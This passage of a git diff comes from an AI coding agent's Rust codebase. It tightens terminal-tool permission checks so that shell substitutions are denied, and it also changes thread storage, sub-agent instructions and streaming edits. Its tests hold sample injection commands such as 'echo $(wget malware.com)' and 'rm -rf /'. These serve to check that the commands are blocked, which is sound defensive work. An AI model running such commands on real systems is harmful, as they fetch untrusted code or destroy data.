anyhow}; use gpui::{App, Context, Entity, Global, Task, prelude::*}; -use std::collections::HashMap; use util::path_list::PathList; struct GlobalThreadStore(Entity); @@ -11,7 +10,6 @@ impl Global for GlobalThreadStore {} pub struct ThreadStore { threads: Vec, - threads_by_paths: HashMap>, } impl ThreadStore { @@ -31,7 +29,6 @@ impl ThreadStore { pub fn new(cx: &mut Context) -> Self { let this = Self { threads: Vec::new(), - threads_by_paths: HashMap::default(), }; this.reload(cx); this @@ -97,16 +94,10 @@ impl ThreadStore { let all_threads = database.list_threads().await?; this.update(cx, |this, cx| { this.threads.clear(); - this.threads_by_paths.clear(); for thread in all_threads { if thread.parent_session_id.is_some() { continue; } - let index = this.threads.len(); - this.threads_by_paths - .entry(thread.folder_paths.clone()) - .or_default() - .push(index); this.threads.push(thread); } cx.notify(); @@ -122,15 +113,6 @@ impl ThreadStore { pub fn entries(&self) -> impl Iterator + '_ { self.threads.iter().cloned() } - - /// Returns threads whose folder_paths match the given paths exactly. - /// Uses a cached index for O(1) lookup per path list. - pub fn threads_for_paths(&self, paths: &PathList) -> impl Iterator { - self.threads_by_paths - .get(paths) - .into_iter() - .flat_map(|indices| indices.iter().map(|&index| &self.threads[index])) - } } #[cfg(test)] @@ -306,50 +288,4 @@ mod tests { assert_eq!(entries[0].id, first_id); assert_eq!(entries[1].id, second_id); } - - #[gpui::test] - async fn test_threads_for_paths_filters_correctly(cx: &mut TestAppContext) { - let thread_store = cx.new(|cx| ThreadStore::new(cx)); - cx.run_until_parked(); - - let project_a_paths = PathList::new(&[std::path::PathBuf::from("/home/user/project-a")]); - let project_b_paths = PathList::new(&[std::path::PathBuf::from("/home/user/project-b")]); - - let thread_a = make_thread( - "Thread in A", - Utc.with_ymd_and_hms(2024, 1, 1, 0, 0, 0).unwrap(), - ); - let thread_b = make_thread( - "Thread in B", - Utc.with_ymd_and_hms(2024, 1, 2, 0, 0, 0).unwrap(), - ); - let thread_a_id = session_id("thread-a"); - let thread_b_id = session_id("thread-b"); - - let save_a = thread_store.update(cx, |store, cx| { - store.save_thread(thread_a_id.clone(), thread_a, project_a_paths.clone(), cx) - }); - save_a.await.unwrap(); - - let save_b = thread_store.update(cx, |store, cx| { - store.save_thread(thread_b_id.clone(), thread_b, project_b_paths.clone(), cx) - }); - save_b.await.unwrap(); - - cx.run_until_parked(); - - thread_store.read_with(cx, |store, _cx| { - let a_threads: Vec<_> = store.threads_for_paths(&project_a_paths).collect(); - assert_eq!(a_threads.len(), 1); - assert_eq!(a_threads[0].id, thread_a_id); - - let b_threads: Vec<_> = store.threads_for_paths(&project_b_paths).collect(); - assert_eq!(b_threads.len(), 1); - assert_eq!(b_threads[0].id, thread_b_id); - - let nonexistent = PathList::new(&[std::path::PathBuf::from("/nonexistent")]); - let no_threads: Vec<_> = store.threads_for_paths(&nonexistent).collect(); - assert!(no_threads.is_empty()); - }); - } } diff --git a/crates/agent/src/tool_permissions.rs b/crates/agent/src/tool_permissions.rs index 79564bbddea7063d00e18d97c8eab89533b20da5..345511c5025b25601c630c572980d44a23f724e7 100644 --- a/crates/agent/src/tool_permissions.rs +++ b/crates/agent/src/tool_permissions.rs @@ -2,13 +2,19 @@ use crate::AgentTool; use crate::tools::TerminalTool; use agent_settings::{AgentSettings, CompiledRegex, ToolPermissions, ToolRules}; use settings::ToolPermissionMode; -use shell_command_parser::extract_commands; +use shell_command_parser::{ + TerminalCommandValidation, extract_commands, validate_terminal_command, +}; use std::path::{Component, Path}; use std::sync::LazyLock; use util::shell::ShellKind; const HARDCODED_SECURITY_DENIAL_MESSAGE: &str = "Blocked by built-in security rule. This operation is considered too \ harmful to be allowed, and cannot be overridden by settings."; +const INVALID_TERMINAL_COMMAND_MESSAGE: &str = "The terminal command could not be approved because terminal does not \ + allow shell substitutions or interpolations in permission-protected commands. Forbidden examples include $VAR, \ + ${VAR}, $(...), backticks, $((...)), <(...), and >(...). Resolve those values before calling terminal, or ask \ + the user for the literal value to use."; /// Security rules that are always enforced and cannot be overridden by any setting. /// These protect against catastrophic operations like wiping filesystems. @@ -256,7 +262,30 @@ impl ToolPermissionDecision { return denial; } - let rules = match permissions.tools.get(tool_name) { + let rules = permissions.tools.get(tool_name); + + // Check for invalid regex patterns before evaluating rules. + // If any patterns failed to compile, block the tool call entirely. + if let Some(error) = rules.and_then(|rules| check_invalid_patterns(tool_name, rules)) { + return ToolPermissionDecision::Deny(error); + } + + if tool_name == TerminalTool::NAME + && !rules.map_or( + matches!(permissions.default, ToolPermissionMode::Allow), + |rules| is_unconditional_allow_all(rules, permissions.default), + ) + && inputs.iter().any(|input| { + matches!( + validate_terminal_command(input), + TerminalCommandValidation::Unsafe | TerminalCommandValidation::Unsupported + ) + }) + { + return ToolPermissionDecision::Deny(INVALID_TERMINAL_COMMAND_MESSAGE.into()); + } + + let rules = match rules { Some(rules) => rules, None => { // No tool-specific rules, use the global default @@ -270,12 +299,6 @@ impl ToolPermissionDecision { } }; - // Check for invalid regex patterns before evaluating rules. - // If any patterns failed to compile, block the tool call entirely. - if let Some(error) = check_invalid_patterns(tool_name, rules) { - return ToolPermissionDecision::Deny(error); - } - // For the terminal tool, parse each input command to extract all sub-commands. // This prevents shell injection attacks where a user configures an allow // pattern like "^ls" and an attacker crafts "ls && rm -rf /". @@ -407,6 +430,18 @@ fn check_commands( } } +fn is_unconditional_allow_all(rules: &ToolRules, global_default: ToolPermissionMode) -> bool { + // `always_allow` is intentionally not checked here: when the effective default + // is already Allow and there are no deny/confirm restrictions, allow patterns + // are redundant — the user has opted into allowing everything. + rules.always_deny.is_empty() + && rules.always_confirm.is_empty() + && matches!( + rules.default.unwrap_or(global_default), + ToolPermissionMode::Allow + ) +} + /// Checks if the tool rules contain any invalid regex patterns. /// Returns an error message if invalid patterns are found. fn check_invalid_patterns(tool_name: &str, rules: &ToolRules) -> Option { @@ -560,6 +595,7 @@ mod tests { message_editor_min_lines: 1, tool_permissions, show_turn_stats: false, + new_thread_location: Default::default(), } } @@ -1066,6 +1102,107 @@ mod tests { )); } + #[test] + fn invalid_substitution_bearing_command_denies_by_default() { + let decision = no_rules("echo $HOME", ToolPermissionMode::Deny); + assert!(matches!(decision, ToolPermissionDecision::Deny(_))); + } + + #[test] + fn invalid_substitution_bearing_command_denies_in_confirm_mode() { + let decision = no_rules("echo $(whoami)", ToolPermissionMode::Confirm); + assert!(matches!(decision, ToolPermissionDecision::Deny(_))); + } + + #[test] + fn unconditional_allow_all_bypasses_invalid_command_rejection_without_tool_rules() { + let decision = no_rules("echo $HOME", ToolPermissionMode::Allow); + assert_eq!(decision, ToolPermissionDecision::Allow); + } + + #[test] + fn unconditional_allow_all_bypasses_invalid_command_rejection_with_terminal_default_allow() { + let mut tools = collections::HashMap::default(); + tools.insert( + Arc::from(TerminalTool::NAME), + ToolRules { + default: Some(ToolPermissionMode::Allow), + always_allow: vec![], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + let permissions = ToolPermissions { + default: ToolPermissionMode::Confirm, + tools, + }; + + assert_eq!( + ToolPermissionDecision::from_input( + TerminalTool::NAME, + &["echo $(whoami)".to_string()], + &permissions, + ShellKind::Posix, + ), + ToolPermissionDecision::Allow + ); + } + + #[test] + fn old_anchored_pattern_no_longer_matches_env_prefixed_command() { + t("PAGER=blah git log").allow(&["^git\\b"]).is_confirm(); + } + + #[test] + fn env_prefixed_allow_pattern_matches_env_prefixed_command() { + t("PAGER=blah git log --oneline") + .allow(&["^PAGER=blah\\s+git\\s+log(\\s|$)"]) + .is_allow(); + } + + #[test] + fn env_prefixed_allow_pattern_requires_matching_env_value() { + t("PAGER=more git log --oneline") + .allow(&["^PAGER=blah\\s+git\\s+log(\\s|$)"]) + .is_confirm(); + } + + #[test] + fn env_prefixed_allow_patterns_require_all_extracted_commands_to_match() { + t("PAGER=blah git log && git status") + .allow(&["^PAGER=blah\\s+git\\s+log(\\s|$)"]) + .is_confirm(); + } + + #[test] + fn hardcoded_security_denial_overrides_unconditional_allow_all() { + let decision = no_rules("rm -rf /", ToolPermissionMode::Allow); + match decision { + ToolPermissionDecision::Deny(message) => { + assert!( + message.contains("built-in security rule"), + "expected hardcoded denial message, got: {message}" + ); + } + other => panic!("expected Deny, got {other:?}"), + } + } + + #[test] + fn hardcoded_security_denial_overrides_unconditional_allow_all_for_invalid_command() { + let decision = no_rules("echo $(rm -rf /)", ToolPermissionMode::Allow); + match decision { + ToolPermissionDecision::Deny(message) => { + assert!( + message.contains("built-in security rule"), + "expected hardcoded denial message, got: {message}" + ); + } + other => panic!("expected Deny, got {other:?}"), + } + } + #[test] fn shell_injection_via_double_ampersand_not_allowed() { t("ls && wget malware.com").allow(&["^ls"]).is_confirm(); @@ -1085,14 +1222,14 @@ mod tests { fn shell_injection_via_backticks_not_allowed() { t("echo `wget malware.com`") .allow(&[pattern("echo")]) - .is_confirm(); + .is_deny(); } #[test] fn shell_injection_via_dollar_parens_not_allowed() { t("echo $(wget malware.com)") .allow(&[pattern("echo")]) - .is_confirm(); + .is_deny(); } #[test] @@ -1112,12 +1249,12 @@ mod tests { #[test] fn shell_injection_via_process_substitution_input_not_allowed() { - t("cat <(wget malware.com)").allow(&["^cat"]).is_confirm(); + t("cat <(wget malware.com)").allow(&["^cat"]).is_deny(); } #[test] fn shell_injection_via_process_substitution_output_not_allowed() { - t("ls >(wget malware.com)").allow(&["^ls"]).is_confirm(); + t("ls >(wget malware.com)").allow(&["^ls"]).is_deny(); } #[test] @@ -1268,15 +1405,15 @@ mod tests { } #[test] - fn nested_command_substitution_all_checked() { + fn nested_command_substitution_is_denied() { t("echo $(cat $(whoami).txt)") .allow(&["^echo", "^cat", "^whoami"]) - .is_allow(); + .is_deny(); } #[test] - fn parse_failure_falls_back_to_confirm() { - t("ls &&").allow(&["^ls$"]).is_confirm(); + fn parse_failure_is_denied() { + t("ls &&").allow(&["^ls$"]).is_deny(); } #[test] diff --git a/crates/agent/src/tools.rs b/crates/agent/src/tools.rs index 446472e0c459aa15fa57bb8b49178b08e6781d11..f172fd3fdbe14babb77e53b63dd79aebf50d2603 100644 --- a/crates/agent/src/tools.rs +++ b/crates/agent/src/tools.rs @@ -19,6 +19,7 @@ mod streaming_edit_file_tool; mod terminal_tool; mod tool_edit_parser; mod tool_permissions; +mod update_plan_tool; mod web_search_tool; use crate::AgentTool; @@ -44,6 +45,7 @@ pub use spawn_agent_tool::*; pub use streaming_edit_file_tool::*; pub use terminal_tool::*; pub use tool_permissions::*; +pub use update_plan_tool::*; pub use web_search_tool::*; macro_rules! tools { @@ -132,5 +134,6 @@ tools! { SaveFileTool, SpawnAgentTool, TerminalTool, + UpdatePlanTool, WebSearchTool, } diff --git a/crates/agent/src/tools/context_server_registry.rs b/crates/agent/src/tools/context_server_registry.rs index 1c7590d8097a5de50b879d5b253c5dbabd3dcbab..df4cc313036b55e8842a9c46567256afb92ed944 100644 --- a/crates/agent/src/tools/context_server_registry.rs +++ b/crates/agent/src/tools/context_server_registry.rs @@ -253,12 +253,14 @@ impl ContextServerRegistry { let project::context_server_store::ServerStatusChangedEvent { server_id, status } = event; match status { - ContextServerStatus::Starting => {} + ContextServerStatus::Starting | ContextServerStatus::Authenticating => {} ContextServerStatus::Running => { self.reload_tools_for_server(server_id.clone(), cx); self.reload_prompts_for_server(server_id.clone(), cx); } - ContextServerStatus::Stopped | ContextServerStatus::Error(_) => { + ContextServerStatus::Stopped + | ContextServerStatus::Error(_) + | ContextServerStatus::AuthRequired => { if let Some(registered_server) = self.registered_servers.remove(server_id) { if !registered_server.tools.is_empty() { cx.emit(ContextServerRegistryEvent::ToolsChanged); diff --git a/crates/agent/src/tools/copy_path_tool.rs b/crates/agent/src/tools/copy_path_tool.rs index 7f53a5c36a7979a01de96535f19e421fa3119e16..95688f27dcd8ca04aef72358ce52144f95138e17 100644 --- a/crates/agent/src/tools/copy_path_tool.rs +++ b/crates/agent/src/tools/copy_path_tool.rs @@ -266,7 +266,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; @@ -372,7 +375,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( diff --git a/crates/agent/src/tools/create_directory_tool.rs b/crates/agent/src/tools/create_directory_tool.rs index 5d8930f3c7400428d55cfe7d14bafc16d94be43a..d6c59bcce30ab26991edba0fa7181ec45d10e1b0 100644 --- a/crates/agent/src/tools/create_directory_tool.rs +++ b/crates/agent/src/tools/create_directory_tool.rs @@ -241,7 +241,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; @@ -359,7 +362,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( diff --git a/crates/agent/src/tools/delete_path_tool.rs b/crates/agent/src/tools/delete_path_tool.rs index 27ab68db667a4cf3223e6521682814dc1c245bb7..7433975c7b782a145dd3e5a80ee59cd92945a989 100644 --- a/crates/agent/src/tools/delete_path_tool.rs +++ b/crates/agent/src/tools/delete_path_tool.rs @@ -301,7 +301,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; @@ -428,7 +431,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( diff --git a/crates/agent/src/tools/edit_file_tool.rs b/crates/agent/src/tools/edit_file_tool.rs index 29b08ac09db4417123403fd3915b8575791b2a4e..0b4d7ce5eb94b79ed8f822e14b76c191788afcf9 100644 --- a/crates/agent/src/tools/edit_file_tool.rs +++ b/crates/agent/src/tools/edit_file_tool.rs @@ -1374,7 +1374,10 @@ mod tests { event .response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); authorize_task.await.unwrap(); } diff --git a/crates/agent/src/tools/list_directory_tool.rs b/crates/agent/src/tools/list_directory_tool.rs index 1a674aaa71fef5bf9c11688e82982a5dbcfee331..7abbe1ed4c488210b9079e59765dddc8d5208bed 100644 --- a/crates/agent/src/tools/list_directory_tool.rs +++ b/crates/agent/src/tools/list_directory_tool.rs @@ -848,7 +848,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; diff --git a/crates/agent/src/tools/move_path_tool.rs b/crates/agent/src/tools/move_path_tool.rs index c246b3c5b0661546f4617bb5521766f9da3839fb..147947bb67ec646c38b51f37dd75779ed78ec85b 100644 --- a/crates/agent/src/tools/move_path_tool.rs +++ b/crates/agent/src/tools/move_path_tool.rs @@ -273,7 +273,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; @@ -379,7 +382,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( diff --git a/crates/agent/src/tools/read_file_tool.rs b/crates/agent/src/tools/read_file_tool.rs index f7a75bc63a1c461b65c3a2e6f74f2c70e0ca15f6..093a8580892cfc4cec0a061bcc10717b28c608f2 100644 --- a/crates/agent/src/tools/read_file_tool.rs +++ b/crates/agent/src/tools/read_file_tool.rs @@ -896,7 +896,10 @@ mod test { ); authorization .response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = read_task.await; @@ -1185,7 +1188,10 @@ mod test { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; diff --git a/crates/agent/src/tools/restore_file_from_disk_tool.rs b/crates/agent/src/tools/restore_file_from_disk_tool.rs index c1aa8690a840ea6911dcb94c26c8cef3cb5f313d..9273ea5b8bb041e0ea53f3ea72b94b46e5a7e294 100644 --- a/crates/agent/src/tools/restore_file_from_disk_tool.rs +++ b/crates/agent/src/tools/restore_file_from_disk_tool.rs @@ -523,7 +523,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let _result = task.await; @@ -651,7 +654,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( diff --git a/crates/agent/src/tools/save_file_tool.rs b/crates/agent/src/tools/save_file_tool.rs index 99e937b9dff2a1b4781dde16bd2bf6d64edd25ad..c6a1cd79db65127164fe66f966029b58a366da7f 100644 --- a/crates/agent/src/tools/save_file_tool.rs +++ b/crates/agent/src/tools/save_file_tool.rs @@ -518,7 +518,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let _result = task.await; @@ -646,7 +649,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( @@ -727,7 +733,10 @@ mod tests { let auth = event_rx.expect_authorization().await; auth.response - .send(acp::PermissionOptionId::new("deny")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("deny"), + acp::PermissionOptionKind::RejectOnce, + )) .unwrap(); let output = task.await.unwrap(); diff --git a/crates/agent/src/tools/spawn_agent_tool.rs b/crates/agent/src/tools/spawn_agent_tool.rs index 9c10b2fbf127c42d842300f4af865c4297cdedb8..27afbbdc3ea05ddbfea689d1bb1a18c53b42198b 100644 --- a/crates/agent/src/tools/spawn_agent_tool.rs +++ b/crates/agent/src/tools/spawn_agent_tool.rs @@ -10,21 +10,30 @@ use std::sync::Arc; use crate::{AgentTool, ThreadEnvironment, ToolCallEventStream, ToolInput}; -/// Spawns an agent to perform a delegated task. +/// Spawn a sub-agent for a well-scoped task. /// -/// Use this tool when you want to: -/// - Run multiple tasks in parallel. -/// - Delegate a self-contained task where you only need the final outcome. +/// ### Designing delegated subtasks +/// - An agent does not see your conversation history. Include all relevant context (file paths, requirements, constraints) in the message. +/// - Subtasks must be concrete, well-defined, and self-contained. +/// - Delegated subtasks must materially advance the main task. +/// - Do not duplicate work between your work and delegated subtasks. +/// - Do not use this tool for tasks you could accomplish directly with one or two tool calls. +/// - When you delegate work, focus on coordinating and synthesizing results instead of duplicating the same work yourself. +/// - Avoid issuing multiple delegate calls for the same unresolved subproblem unless the new delegated task is genuinely different and necessary. +/// - Narrow the delegated ask to the concrete output you need next. +/// - For code-edit subtasks, decompose work so each delegated task has a disjoint write set. +/// - When sending a follow-up using an existing agent session_id, the agent already has the context from the previous turn. Send only a short, direct message. Do NOT repeat the original task or context. /// -/// Do NOT use this tool for tasks you could accomplish directly with one or two tool calls (e.g. reading a file, running a single command). +/// ### Parallel delegation patterns +/// - Run multiple independent information-seeking subtasks in parallel when you have distinct questions that can be answered independently. +/// - Split implementation into disjoint codebase slices and spawn multiple agents for them in parallel when the write scopes do not overlap. +/// - When a plan has multiple independent steps, prefer delegating those steps in parallel rather than serializing them unnecessarily. +/// - Reuse the returned session_id when you want to follow up on the same delegated subproblem instead of creating a duplicate session. /// -/// You will receive only the agent's final message as output. -/// -/// **New session** (no session_id): Creates a new agent that does NOT see your conversation history. Include all relevant context (file paths, requirements, constraints) in the message. -/// -/// **Follow-up** (with session_id): Sends a follow-up to an existing agent session. The agent already has full context, so send only a short, direct message — do NOT repeat the original task or context. Examples: "Also update the tests", "Fix the compile error in foo.rs", "Retry". -/// -/// - If spawning multiple agents that might write to the filesystem, provide guidance on how to avoid conflicts (e.g. assign each to different directories). +/// ### Output +/// - You will receive only the agent's final message as output. +/// - Successful calls return a session_id that you can use for follow-up messages. +/// - Error results may also include a session_id if a session was already created. #[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)] #[serde(rename_all = "snake_case")] pub struct SpawnAgentToolInput { diff --git a/crates/agent/src/tools/streaming_edit_file_tool.rs b/crates/agent/src/tools/streaming_edit_file_tool.rs index f3f100b4434b4f9e5d0830d8ba525a45b28906f6..4be6b8c61efb237279cbef298242b7b6e35857ce 100644 --- a/crates/agent/src/tools/streaming_edit_file_tool.rs +++ b/crates/agent/src/tools/streaming_edit_file_tool.rs @@ -118,7 +118,7 @@ pub struct Edit { pub new_text: String, } -#[derive(Default, Debug, Deserialize)] +#[derive(Clone, Default, Debug, Deserialize)] struct StreamingEditFileToolPartialInput { #[serde(default)] display_description: Option, @@ -132,7 +132,7 @@ struct StreamingEditFileToolPartialInput { edits: Option>, } -#[derive(Default, Debug, Deserialize)] +#[derive(Clone, Default, Debug, Deserialize)] pub struct PartialEdit { #[serde(default)] pub old_text: Option, @@ -314,12 +314,19 @@ impl AgentTool for StreamingEditFileTool { ) -> Task> { cx.spawn(async move |cx: &mut AsyncApp| { let mut state: Option = None; + let mut last_partial: Option = None; loop { futures::select! { partial = input.recv_partial().fuse() => { let Some(partial_value) = partial else { break }; if let Ok(parsed) = serde_json::from_value::(partial_value) { + let path_complete = parsed.path.is_some() + && parsed.path.as_ref() == last_partial.as_ref().and_then(|p| p.path.as_ref()); + + last_partial = Some(parsed.clone()); + if state.is_none() + && path_complete && let StreamingEditFileToolPartialInput { path: Some(path), display_description: Some(display_description), @@ -768,14 +775,6 @@ impl EditSession { ensure_buffer_saved(&buffer, &abs_path, tool, cx)?; - if matches!(mode, StreamingEditFileMode::Write) { - tool.action_log.update(cx, |log, cx| { - log.buffer_created(buffer.clone(), cx); - }); - } - tool.action_log - .update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); - let diff = cx.new(|cx| match mode { StreamingEditFileMode::Write => Diff::manual(buffer.clone(), cx), StreamingEditFileMode::Edit => Diff::new(buffer.clone(), cx), @@ -789,6 +788,11 @@ impl EditSession { } }) as Box); + tool.action_log.update(cx, |log, cx| match mode { + StreamingEditFileMode::Write => log.buffer_created(buffer.clone(), cx), + StreamingEditFileMode::Edit => log.buffer_read(buffer.clone(), cx), + }); + let old_snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); let old_text = cx .background_spawn({ @@ -1975,6 +1979,13 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Setup + single edit that stays in-progress (no second edit to prove completion) + sender.send_partial(json!({ + "display_description": "Single edit", + "path": "root/file.txt", + "mode": "edit", + })); + cx.run_until_parked(); + sender.send_partial(json!({ "display_description": "Single edit", "path": "root/file.txt", @@ -2637,7 +2648,10 @@ mod tests { event .response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); authorize_task.await.unwrap(); } @@ -3543,6 +3557,12 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Transition to BufferResolved + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + })); + cx.run_until_parked(); + sender.send_partial(json!({ "display_description": "Overwrite file", "path": "root/file.txt", @@ -3618,8 +3638,9 @@ mod tests { // Verify buffer still has old content (no content partial yet) let buffer = project.update(cx, |project, cx| { let path = project.find_project_path("root/file.txt", cx).unwrap(); - project.get_open_buffer(&path, cx).unwrap() + project.open_buffer(path, cx) }); + let buffer = buffer.await.unwrap(); assert_eq!( buffer.read_with(cx, |b, _| b.text()), "old line 1\nold line 2\nold line 3\n" @@ -3758,7 +3779,7 @@ mod tests { assert!( !changed.is_empty(), "action_log.changed_buffers() should be non-empty after streaming edit, - but no changed buffers were found \u{2014} Accept All / Reject All will not appear" + but no changed buffers were found - Accept All / Reject All will not appear" ); } @@ -3803,6 +3824,157 @@ mod tests { ); } + #[gpui::test] + async fn test_streaming_edit_file_tool_fields_out_of_order_in_write_mode( + cx: &mut TestAppContext, + ) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "old_content"})).await; + let (sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "write" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "write", + "content": "new_content" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "write", + "content": "new_content", + "path": "root" + })); + cx.run_until_parked(); + + // Send final. + sender.send_final(json!({ + "display_description": "Overwrite file", + "mode": "write", + "content": "new_content", + "path": "root/file.txt" + })); + + let result = task.await; + let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "new_content"); + } + + #[gpui::test] + async fn test_streaming_edit_file_tool_fields_out_of_order_in_edit_mode( + cx: &mut TestAppContext, + ) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "old_content"})).await; + let (sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "edit" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content"}] + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content", "new_text": "new_content"}] + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content", "new_text": "new_content"}], + "path": "root" + })); + cx.run_until_parked(); + + // Send final. + sender.send_final(json!({ + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content", "new_text": "new_content"}], + "path": "root/file.txt" + })); + cx.run_until_parked(); + + let result = task.await; + let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "new_content"); + } + + #[gpui::test] + async fn test_streaming_reject_created_file_deletes_it(cx: &mut TestAppContext) { + let (tool, _project, action_log, fs, _thread) = setup_test(cx, json!({"dir": {}})).await; + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + agent_settings::AgentSettings::override_global(settings, cx); + }); + + // Create a new file via the streaming edit file tool + let (event_stream, _rx) = ToolCallEventStream::test(); + let task = cx.update(|cx| { + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Create new file".into(), + path: "root/dir/new_file.txt".into(), + mode: StreamingEditFileMode::Write, + content: Some("Hello, World!".into()), + edits: None, + }), + event_stream, + cx, + ) + }); + let result = task.await; + assert!(result.is_ok(), "create should succeed: {:?}", result.err()); + cx.run_until_parked(); + + assert!( + fs.is_file(path!("/root/dir/new_file.txt").as_ref()).await, + "file should exist after creation" + ); + + // Reject all edits — this should delete the newly created file + let changed = action_log.read_with(cx, |log, cx| log.changed_buffers(cx)); + assert!( + !changed.is_empty(), + "action_log should track the created file as changed" + ); + + action_log + .update(cx, |log, cx| log.reject_all_edits(None, cx)) + .await; + cx.run_until_parked(); + + assert!( + !fs.is_file(path!("/root/dir/new_file.txt").as_ref()).await, + "file should be deleted after rejecting creation, but an empty file was left behind" + ); + } + async fn setup_test_with_fs( cx: &mut TestAppContext, fs: Arc, diff --git a/crates/agent/src/tools/terminal_tool.rs b/crates/agent/src/tools/terminal_tool.rs index 6396bd1b0e63b46a0207dd7df9b9f2fcd00176b7..82bf9a06480bb7d6db3611516281f42452ec5137 100644 --- a/crates/agent/src/tools/terminal_tool.rs +++ b/crates/agent/src/tools/terminal_tool.rs @@ -29,6 +29,8 @@ const COMMAND_OUTPUT_LIMIT: u64 = 16 * 1024; /// /// Make sure you use the `cd` parameter to navigate to one of the root directories of the project. NEVER do it as part of the `command` itself, otherwise it will error. /// +/// Do not generate terminal commands that use shell substitutions or interpolations such as `$VAR`, `${VAR}`, `$(...)`, backticks, `$((...))`, 